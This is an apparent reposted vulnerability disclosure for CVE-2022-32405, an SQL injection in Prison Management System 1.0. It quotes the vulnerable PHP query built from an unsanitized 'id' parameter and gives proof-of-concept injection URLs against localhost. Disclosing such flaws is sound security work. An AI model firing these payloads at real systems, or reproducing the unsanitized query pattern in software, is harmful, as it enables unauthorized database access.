Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-32405: BugBounty/cve-2022-32405.md at main · Dyrandy/BugBounty

Prison Management System v1.0 was discovered to contain a SQL injection vulnerability via the ‘id’ parameter at /pms/admin/prisons/view_prison.php:4

CVE
Open in Source
#sql#vulnerability#php

CVE-2022-32405****Info****Prison Management System 1.0 - SQL Injection
****Vendor Homepage : https://www.sourcecodester.com/
****Software Link : https://www.sourcecodester.com/php/15368/prison-management-system-phpoop-free-source-code.html

[+] Vulnerability : SQL Injection
[+] Vulnerability Location : $_GET[‘id’] in /pms/admin/prisons/view_prison.php:4

$qry = $conn->query("SELECT * from `prison_list` where id = ‘{$_GET[‘id’]}’ and delete_flag = 0 ");

PoC

  • Payload :

    Error Based

    http://localhost/pms/admin/prisons/view_prison.php?id=1’-if(database()=’pms_db’,0,1)%23

  • True : http://localhost/pms/admin/prisons/view_prison.php?id=1’-if(database()=’pms_db’,0,1)%23
  • False : http://localhost/pms/admin/prisons/view_prison.php?id=1’-if(database()=’wrong’,0,1)%23

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE